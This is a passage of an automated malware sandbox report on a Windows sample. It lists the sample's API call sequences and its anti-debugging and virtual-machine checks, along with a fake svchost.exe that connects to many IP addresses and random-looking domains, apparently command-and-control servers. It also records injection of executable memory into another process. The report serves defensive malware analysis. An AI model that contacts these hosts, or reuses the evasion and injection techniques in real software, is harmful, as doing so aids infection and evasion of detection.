Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A3BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,9_2_00A3BB20
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A47CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,9_2_00A47CE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A266D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,9_2_00A266D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A4BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,9_2_00A4BE40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9C3DB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,2_2_02C9C3DB
Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.0000000001018000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6
Source: svchost.exe, 00000002.00000003.2178331950.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2252938368.0000000000899000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3413102831.000000000088A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSAFD L2CAP [Bluetooth]Hyper-V RAWRSVP UDPv6 Service Provider
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000EE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2676884944.0000000000988000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP2
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000021.00000002.2735525180.0000000000BC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000001B.00000002.2704786196.0000000001387000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
Source: svchost.exe, 00000002.00000003.2223016601.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2252938368.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3413265981.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279237129.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.0000000001018000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000002.00000002.3407860513.0000000000826000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
Source: UMwpXhA46R.exe, 00000000.00000002.2153963365.000000000069E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~windows\system32\vmhgfs.DLL
Source: svchost.exe, 00000002.00000002.3407860513.0000000000826000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hwindows\system32\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00401A30 rdtsc 0_2_00401A30
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012564A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,6_2_012564A0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C76A30 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA,2_2_02C76A30
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00401FC0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_00401FC0
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00406800 mov eax, dword ptr fs:[00000030h]0_2_00406800
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00406B60 mov eax, dword ptr fs:[00000030h]0_2_00406B60
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00406B60 mov edx, dword ptr fs:[00000030h]0_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406800 mov eax, dword ptr fs:[00000030h]2_2_00406800
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406B60 mov eax, dword ptr fs:[00000030h]2_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406B60 mov edx, dword ptr fs:[00000030h]2_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029A1360 mov eax, dword ptr fs:[00000030h]2_2_029A1360
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029A1360 mov edx, dword ptr fs:[00000030h]2_2_029A1360
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029A1000 mov eax, dword ptr fs:[00000030h]2_2_029A1000
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_011E1360 mov eax, dword ptr fs:[00000030h]6_2_011E1360
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_011E1360 mov edx, dword ptr fs:[00000030h]6_2_011E1360
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_011E1000 mov eax, dword ptr fs:[00000030h]6_2_011E1000
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_00FE1360 mov eax, dword ptr fs:[00000030h]7_2_00FE1360
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_00FE1360 mov edx, dword ptr fs:[00000030h]7_2_00FE1360
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_00FE1000 mov eax, dword ptr fs:[00000030h]7_2_00FE1000
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009C1360 mov eax, dword ptr fs:[00000030h]9_2_009C1360
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009C1360 mov edx, dword ptr fs:[00000030h]9_2_009C1360
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009C1000 mov eax, dword ptr fs:[00000030h]9_2_009C1000
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_004010A0 CreateFileA,GetFileSizeEx,GetProcessHeap,RtlAllocateHeap,memset,ReadFile,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,IsBadWritePtr,0_2_004010A0

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 106.15.232.163 8000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.190.63.136 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 72.52.179.174 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: qexyhap.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 45.79.19.196 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.85.183.50 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.225.91.73 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: purygeg.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 52.34.198.229 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 75.2.71.199 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.150.10.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 23.253.46.64 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.191.50.83 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.212.210 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 76.223.67.189 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: lyryjir.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.59.243.227 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.182.252 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: vojycit.com
Source: C:\Windows\apppatch\svchost.exeDomain query: lymylen.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.97.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.212.231.82 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 85.17.31.122 80Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11E0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9C0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2EA0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2AF0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2AB0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 24F0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2E80000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 25F0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2670000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1550000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: CD0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1540000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1070000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1470000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1220000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 600000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 940000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F70000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1570000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10E0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1220000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1250000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AC0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1400000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 14A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1020000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1190000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1550000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A20000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: CB0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11A0000 protect: page execute and read and writeJump to behavior
